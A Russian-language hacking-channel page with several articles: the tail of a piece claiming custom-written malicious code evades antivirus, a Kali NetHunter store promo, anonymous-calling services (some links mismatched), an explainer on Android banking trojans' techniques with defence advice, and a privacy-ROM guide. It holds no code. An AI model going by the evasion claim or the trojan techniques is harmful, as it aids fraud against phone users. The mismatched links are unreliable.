Остался один вопрос: действительно такое ПО будет не обнаруживаемым для антивирусных программ?

Я скомпилировал мой код и проверил exe файл на сайте Virustotal. Это веб-инструмент, который вычисляет хеш файла, который вы загрузили и ищет его в базе данных известных вирусов. Сюрприз! Естественно ничего не нашлось.

В этом основная фишка! Вы всегда можете менять код и развиваться, будучи всегда на несколько шагов раньше сканеров угроз. Если вы в состоянии написать свой собственный код он почти гарантированно будет не обнаружим.

HIDDEN COMMUNITY - информационная безопасность, хакинг, полезные статьи (зеркало)

Хакерский Play Market: Kali NetHunter App Store

2020-07-15T12:44:04.028Z

Первоначально разработанная для удобного управления пакетами на устройствах NetHunter поняли, что хранилище NetHunter также должно быть доступно на устройствах, отличных от NetHunter. Итак, вот он, доступный каждому, кто хочет получить лучшее из обоих миров:

Простота использования и удобство Google Play Store

Свобода, анонимность и конфиденциальность загружаемых приложений

Скачать можно по ссылке

Kali NetHunter App Store - это комплексное решение для безопасности приложений Android. Это идеальная альтернатива магазину Google Play для любого Android-устройства, рутированного или нет. Если вы ищете приложение безопасности для вашего устройства Android, NetHunter Store станет лучшим выбором.

Магазин NetHunter работает на слегка модифицированной версии F-Droid, благодаря тяжелой работе сообщества F-Droid, в частности Питера Сервайло, чья помощь была неоценимой. В то время как F-Droid устанавливает своих клиентов с отключенной телеметрией и запрашивает согласие перед отправкой отчетов о сбоях, здесь пошли еще дальше и удалили весь код - просто для того, чтобы конфиденциальность не могла быть нарушена случайно.

HIDDEN COMMUNITY - информационная безопасность, хакинг, полезные статьи (зеркало)

Звонки без SIM карты

2020-06-23T12:26:52.683Z

Возможно, у вас бывали такие ситуации, когда нужно было позвонить человеку и при этом всём остаться полностью анонимным и не спалить свой номер. Использование SIM карты идентифицирует вас c ближайшей к вам сотовой вышкой, скажу вам так если вы используете левую сим и звоните кому-либо с помощью непроверенных сервисов для звонков, то скорее всего вам не получиться остаться анонимным в сети и ваш трафик не зашифрован и нет толку от такой сим-карты, место где вы находитесь смогут отследить.

В связи с этим, хочу с вами поделиться сервисами для звонков. у которых весь трафик проходит через сеть TOR или просто имеет высокую степень шифрования в сети.

Список сайтов:

1. TOX (https://tox.chat/)

2. Linphone (https://www.linphone.org/)

3. jitsi (https://jitsi.org/)

4. Ring (https://www.ringcentral.com/)

5. Mumblen (https://www.mumble.com/)

Лично я сам использовал для анонимных звонков последний сервис и могу порекомендовать вам именно его, но главное, что выбор за вами. Рассказывать вам про каждый сервис, смысла я не вижу, потому что всю подробную информацию можно найти на этих сайтах, которые я указал выше. Может вам и пригодится, то что я вам рассказал.

HIDDEN COMMUNITY - информационная безопасность, хакинг, полезные статьи (зеркало)

Как защититься от банковских троянов?

2020-06-22T10:41:09.138Z

Одним утром мне позвонил друг, занимающийся перевозкой грузов. Нервным голосом он рассказал, что с его банковского счета куда-то пропали 2 миллиона рублей. А в службе поддержки банка развели руками, отправив товарища писать заявление в полицию, поскольку денежные переводы были совершены с помощью мобильного приложения и подтверждены через SMS, что по всем признакам выглядит вполне легальной финансовой операции.

«Ты же программист, — простонал в трубку мой друг, — посоветуй, что делать». К сожалению, что-то делать было уже поздно, ибо инструментом для кражи денег послужил банковский троян (банкер), обосновавшийся на телефоне моего приятеля задолго до этого досадного инцидента. И предотвратить пропажу денег было можно, лишь заранее изучив принципы работы и методы борьбы с таким видом вредоносных приложений. Чем мы в сегодняшней статье и займемся.

Банковские трояны раньше

Первые полноценные банковские трояны для мобильной платформы Android были обнаружены еще в 2011 году. Нет, вредоносы, способные передавать злоумышленникам входящие SMS-сообщения, в том числе содержащие mTAN-коды (коды аутентификации транзакций), существовали и до этого. Кроме того, были известны трояны, умеющие оперировать USSD-командами. Они могли перевести заданную злодеями сумму с «привязанной» к телефону банковской карты, пополнив баланс левого мобильного телефона, или узнать остаток средств на счете. Но полноценными банковскими троянами, конечно же, не были, поскольку заметно уступали по функциональным возможностям своим десктопным аналогам.

Все изменилось с появлением Android.SpyEye. Этот трой работал в связке с вредоносом SpyEye для Windows, благодаря чему обрел способность обходить двухфакторную аутентификацию. Действовал он следующим образом.

Как только пользователь зараженной винды открывал в браузере банковский сайт, работающий на компе трой выполнял веб-инжект, встраивая в страницу кусок HTML-кода, который он подгружал из конфига. Поскольку инжект осуществлялся на стороне клиента, URL банковского сайта в адресной строке браузера оказывался корректным, а соединение было установлено по протоколу HTTPS. Поэтому содержимое веб-страницы не вызывало у жертвы никаких подозрений.

Текст, встроенный трояном в банковский сайт, гласил, что банк внезапно изменил условия работы и для авторизации в системе банк-клиент необходимо установить на мобильный телефон небольшое приложение размером около 30 Кбайт, скачав его по предложенной ссылке — «в целях безопасности». Приложением, естественно, был мобильный трой Android.SpyEye.

Эта вредоносная программа не создавала никаких значков, ее можно было отыскать только в списке работающих процессов под названием «Система». Основная задача троя — перехват всех входящих SMS-сообщений и пересылка их на управляющий сервер, адрес которого вредонос брал из XML-конфига.

Так выглядел один из первых мобильных банковских троянов

Когда жертва вводит логин и пароль на банковском сайте в окне браузера, Windows-троян SpyEye перехватывает и отправляет их ботоводам. После этого злоумышленники в любой момент могут авторизоваться с помощью этих данных в системе банк-клиент на сайте банка, однако сервер обязательно отправит владельцу счета проверочный код в SMS, который нужно ввести в специальную форму. Это сообщение будет перехвачено мобильной версией SpyEye и передано вирусописателям. Используя перехват SMS, они смогут выполнять любые операции по счету, например опустошить его подчистую.

Примерно так выглядит схема работы первого мобильного банковского трояна SpyEye

Узким местом этой довольно сложной схемы была необходимость синхронизации работы банковского и десктопного компонентов троянской связки, однако указанную проблему вирусописателям удалось успешно решить. Несколько месяцев SpyEye наводил шорох среди пользователей банковских сервисов, пока не попал в базы всех популярных антивирусов, после чего его деятельность постепенно сошла на нет.

Банковские трояны сегодня

Спустя какое-то время сотрудники IT-отделов банков понемногу освоили веб-программирование, и банк-клиенты окончательно перекочевали с десктопов в мобильные телефоны в виде Android-приложений. Это значительно облегчило жизнь вирусописателям: у них отпала необходимость заморачиваться с троянами под винду, и они смогли наконец полностью сосредоточить свои усилия на разработке мобильных банковских троянов. Ведь владелец Android-смартфона с банковским приложением на борту — это ходячий кошелек, опустошить который мечтает каждый уважающий себя вирмейкер.

Как и прочие вредоносы для Android, банковские трояны распространялись под видом каких-либо полезных программ — «универсальных видеокодеков» или проигрывателей Flash, в том числе через официальный каталог Google Play. Троянская функциональность таких приложений, естественно, не афишировалась разработчиками, и проявлялась она либо спустя какое-то время, либо после загрузки очередного обновления. Так, в одном из случаев банковский троян раздавался в виде программы, якобы объединяющей в себе возможности банк-клиентов сразу нескольких крупных кредитных организаций. Зачем вам куча отдельных приложений, когда вместо них можно скачать одно, с трояном? Также известны случаи, когда вредоносы встраивались в подлинные приложения некоторых банков, модифицированные злоумышленниками. Такие приложения распространялись с поддельных страниц банков, оформленных в точности как настоящие, а жертв на них завлекали рассылками фишинговых писем.

Еще один вектор распространения мобильных банковских троянов — фишинговые SMS-рассылки. Обычно это происходит так. Пользователю, зарегистрированному на одном из сайтов бесплатных объявлений, приходит SMS-сообщение с предложением обмена. При этом получателя называют по имени, что должно усыпить его бдительность, — вирусописатели предварительно распарсили базу пользователей этого сайта, вытянув оттуда всю полезную информацию. При переходе по короткой ссылке из сообщения потенциальная жертва направляется на промежуточную страницу, где определяется, что пользователь зашел на сайт именно с мобильного устройства под управлением Android, и выявляется его мобильный оператор, после чего происходит перенаправление на фейковую страницу с сообщением о поступлении MMS, оформленную в стилистике соответствующего ОПСОСа. После нажатия на кнопку начинается загрузка трояна.

Пример фишинговой SMS-рассылки, цель которой — распространение банковского трояна

Первые мобильные банковские трояны работали очень просто. Если для функционирования вредоноса были нужны права администратора, он настойчиво демонстрировал на экране окно с требованием выдать ему соответствующие полномочия, до тех пор пока измученный пользователь не согласится на это действие. Но иногда вирусописатели шли на различные ухищрения, чтобы обмануть потенциальную жертву. Например, банковский троян Android.BankBot.29 маскировал окно запроса прав администратора под сообщение приложения Google Play: «Ваша версия устарела, использовать новую версию?» При попытке пользователя нажать на экранную кнопку «Да» layout трояна исчезал, и тап попадал на кнопку Accept диалогового окна DeviceAdmin, в результате чего вредонос получал администраторские привилегии.

Получить админские права для Android-трояна не просто, а очень просто

Еще один банковский троян доставал пользователей запросом на включение режима Accessibility Service — специальных возможностей для людей с ограничениями по здоровью. А получив такое разрешение, сам включал для себя админа.

Другой способ получения привилегий — Accessibility Service

После этого трой просто висит в памяти мобильного телефона, ожидая запуска мобильного банковского приложения. При наступлении этого события он определяет, какое именно приложение запущено, и рисует поверх него соответствующую поддельную форму ввода логина и пароля, а введенные данные тут же пересылаются на управляющий сервер по HTTP в виде JSON или на заданный телефонный номер SMS-сообщением. Конфиг мобильного банковского трояна может содержать HTML-код нескольких десятков форм с различным оформлением, копирующим интерфейс приложений наиболее популярных банков. После этого остается только перехватить и отправить в том же направлении SMS с одноразовыми паролями, чтобы предоставить ботоводам полный доступ к банковскому счету. Входящие сообщения от банков при этом обычно скрываются, чтобы не вызывать у жертвы подозрений.

Поддельное окно мобильного банкинга

Мобильные банковские трояны могут рисовать поддельные окна авторизации популярных банков

Сколько денег подобным образом было похищено со счетов пользователей Android, сказать трудно, но суммы здесь наверняка фигурируют шестизначные. Даже если троянам по какой-то причине не удавалось получить доступ к банковскому счету, они благополучно похищали реквизиты банковских карт. Для этого, например, широко использовались фейковые окна привязки карты к приложению Google Play.

Для хищения реквизитов банковских карт многие банковские трояны используют поддельные окна Google Play

Приобрести что-либо ценное в приличных интернет-магазинах с использованием ворованных реквизитов непросто, а вот оплатить онлайн-игрушки или покупку музыки в каком-нибудь сервисе вполне возможно. Подобные сайты редко заморачиваются серьезной проверкой платежных реквизитов, поскольку транзакции там обычно копеечные. Чем и пользуются злоумышленники.

Банкботы — разновидность банковского трояна

Банкботы — это побочная ветвь эволюции мобильных банковских троянов. Если обычные банковские трои работают более-менее автономно, то банкботы способны получать различные управляющие команды и выполнять их на зараженном девайсе.

Команды могут передаваться по HTTP, например в формате JSON, по SMS, а в некоторых случаях даже через специальный Telegram-канал. Большинство банкботов по команде включают или отключают перехват входящих SMS-сообщений, могут скрывать полученные SMS (прятать можно сообщения с определенных номеров или с заданными ключевыми словами), отключать звук мобильного телефона, отправлять сообщения на указанный злоумышленниками номер с заданным содержимым или выполнять USSD-команды. Также ботовод может изменить адрес управляющего сервера или системный номер телефона, на который будет пересылаться информация, если ее не удалось передать по HTTP.

Многие банкботы также могут скачивать и устанавливать на мобильном устройстве APK-файлы, ссылку на которые укажет в команде ботовод. В результате на зараженный девайс попадают другие трояны, имеющие более широкий ассортимент функций. Также некоторые банкботы умеют отображать на экране смартфона активити с присланными злодеем параметрами — это открывает широчайшие возможности для фишинга и реализации самых изощренных мошеннических схем. Ну и почти все такие вредоносы умеют сливать на командный сервер адресную книгу, SMS-переписку и прочие конфиденциальные данные, а также переадресовывать входящие звонки на заданный в команде телефонный номер. Отдельные экземпляры троянов ко всему прочему обладают функциями самозащиты: они отслеживают имена работающих в системе процессов и при обнаружении антивируса пытаются выгрузить его, используя права администратора.

Практически все банкботы используют веб-админку, предоставляющую ботоводам подробную статистику по инфицированным девайсам и похищенной на них информации.

Админка мобильного банковского бота

Админка типичного мобильного банковского бота

Распространение банковских троянов

С распространением мобильных устройств на Android производство троянов для этой платформы стало понемногу превращаться в самую настоящую подпольную индустрию. В полной мере коснулось это и банкеров.

В даркнете стали появляться объявления о сдаче банковских троянов под Android в аренду, с предоставлением клиенту админки и технической поддержки. А затем начали распространяться билдеры, с использованием которых любой желающий без каких-либо навыков программирования мог соорудить банковского трояна, маскирующегося под выбранное приложение или определенную систему банк-клиент.

Билдер для создания банковского троя под Android

Благодаря этому количество банковских троев примерно с 2017 года начало расти если не в геометрической прогрессии, то весьма заметно. И шансы подцепить подобную заразу у пользователей смартфонов на Android тоже значительно выросли. А с учетом того, что большинство подобных вредоносов работает с привилегиями администратора, удалить их с устройства не так-то просто: для этого в лучшем случае придется запустить систему в безопасном режиме, в худшем — сбросить девайс к заводским настройкам со всеми вытекающими последствиями.

Защита от банковского трояна

Доказанный факт: даже отключение на телефоне возможности установки приложений из сторонних источников далеко не всегда защищает пользователя от проникновения банкеров. Случаев загрузки подобных вредоносов даже из официального каталога Google Play известно множество: технология проверки размещаемых там приложений все еще несовершенна.

Кроме того, операционную систему Android отличает значительное количество уязвимостей, которые могут использоваться вирусописателями в своих, отнюдь не благородных целях. Защитить устройство от несанкционированного проникновения зловредов способны антивирусы, но вот устанавливать их или нет — личное дело самих пользователей Android. По крайней мере, мой приятель-коммерсант после инцидента с похищением денег решил больше не испытывать судьбу и скачал на свой телефон такую программу: лишней не будет.

HIDDEN COMMUNITY - информационная безопасность, хакинг, полезные статьи (зеркало)

Анонимный Android

2020-06-22T10:36:36.679Z

Более чем в половине всех устройств на базе Android зияет огромная дыра в безопасности. Сегодня мы попробуем закрыть эту дыру, и в целом анонимизировать систему, используя полезные приложения и решения, о которых я расскажу ниже!

Comodo Mobile Security - одно из самых функциональных и гибко настраиваемых приложений для бесплатной защиты мобильных устройств на базе Андроид. Кроме типичного набора антивирусных модулей, в нём есть такие дополнения, как менеджер трафика,показывающий в реальном времени всю сетевую активность всех активных приложений: в сотовых 3G/4G сетях и при подключении по Wifi. С правами администратора (Суперпользователя)в менеджере трафика есть возможность использовать простой программный фаервол(межсетевой экран).

Clean Master - удаление следов работы и антивирус.

History Eraser - ещё одна программа для удаления следов работы.

Orbot - Tor для Android.

ProxyDroid - настройка прокси на Android устройстве.

Smart App Lock - защита приложений паролем, а также защита соединений (блокировка подключений к интернету, работы с внешним USB-накопителем,исходящих телефонных вызовов).

SSH Tunnel Android - SSH туннелирование для Android.

TunnelBear VPN - позволяет скрыть свой IP с помощью технологий VPN.

TextSecure Private Messenger - мессенджер с защищенной перепиской.

RedPhone Private Calls - мессенджер для защищенной переписки и интернет - телефонии.

Cryptocat - сервис как для мобильного телефона, так и для ПК. У него есть собственные дополнения для браузеров Firefox, Chrome, Safari и Opera, предназначенная для быстрого доступа к чату. Чат предлагается групповой, причем можно устроить переписку с помощью сервера Cryptocat или же переместиться на другой сервер.

NoRoot Firewall - фаервол без Root-прав.

Viaprotect - приложение для проверки защищенности смартфона, контроля трафика, скачивать нужно с официального сайта разработчиков

Shark - для профессионалов рекомендую этот сниффер сетевого трафика. Сниффер записывает логи в формате .pcap и хранит их на SD-карте телефона. Файл с логами можно просмотреть на Windows, так и в самом телефоне, при помощи утилиты Shark Reader.

CyanogenMod - кастомная прошивка с открытым исходным кодом, в отличии от других альтернативных прошивок, работает на большинстве устройств. Лично я советую использовать именно её, ниже прикреплю статью по одной из возможных сборок для анонимности на этой базе.

Программное обеспечение и инструкции можно найти на cyanogenmod.org

OmniROM - ответвление от проекта CyanogenMod, базируется на Android 4.4. Поддерживается некоторыми моделями Samsung, HTC, LG. Информацию по установке и ссылки на загрузки ищите на omnirom.org

Paranoid Android - даёт много возможностей настройки внешнего вида графического интерфейса пользователя. Официально работает примерно с 20 устройствами,неофициально - примерно с 60. Сайт разработчика aospa.co

SlimROMs - для пользователей,предпочитающих максимальную производительность всякому украшательству. Актуальные версии прошивок вместе с инструкциями по установке, ищите на slimroms.net

Понятно, что бороться с утечками в смартфонах, основанных на проприетарных операционных системах, — занятие неблагодарное. Нет открытых исходников — нет доказательств отсутствия скрытых закладок. Чтобы получить хоть сколько-нибудь анонимизированный смартфон, нам понадобится гугл-фон. И не просто гуглофон, а тот, для которого есть официальная версия последней прошивки CyanogenMod и открытые исходники ядра (стоковая прошивка или ядро Android-смартфона также могут содержать бэкдоры).

Когда эти требования будут выполнены, берем смартфон в руки, получаем root - права (как это сделать,можно найти в интернете), регистрируемся в Google Play, устанавливаем приложение ROM Installer и прошиваем с его помощью CyanogenMod. Обязательно отказываемся от установки Google Apps. Их придется принести в жертву великому богу конфиденциальности. После первой загрузки CyanogenMod предложит зарегистрировать или подключить аккаунт CM, а также включить отправку анонимной статистики. Разумеется, от выполнения этих процедур, следует отказаться. Далее приступим к начальной настройке прошивки.

Идем в настройки и отмечаем следующие пункты:

Беспроводные сети ==> Еще ==> NFC ==> Отключить.
Безопасность ==> Блокировка экрана ==> PIN-код.
Безопасность ==> Неизвестные источники.

Ничего особенного, стандартные опции. Потом нам следует обезопасить себя от утечек данных из предустановленных приложений и софта, который будет установлен позже. В CyanogenMod для этого есть механизм Privacy Guard, который занимается обфускацией личных данных пользователя, подсовывая вместо них рандомные данные: случайно сгенерированное имя юзера вместо реального, случайные координаты и прочее. Чтобы его активировать, идем в Настройки - Конфиденциальность - Защищенный режим и включаем опцию Защищенный режим по умолчанию. Теперь он будет активироваться для всех устанавливаемых приложений. Чтобы активировать Privacy Guard для стоковых приложений, нажимаем кнопку настроек сверху (три точки), отмечаем опцию «Системные приложения» и выбираем все приложения, кроме Trebuchet (это рабочий стол). По умолчанию Privacy Guard настроен таким образом, чтобы спрашивать юзера каждый раз, когда приложение пытается получить доступ к личным данным. Разрешать это действие стоит только в том случае, если такие данные ему реально нужны (например, телефон пытается прочитать адресную книгу). На этом все, надеюсь, что вам пригодится данная информация!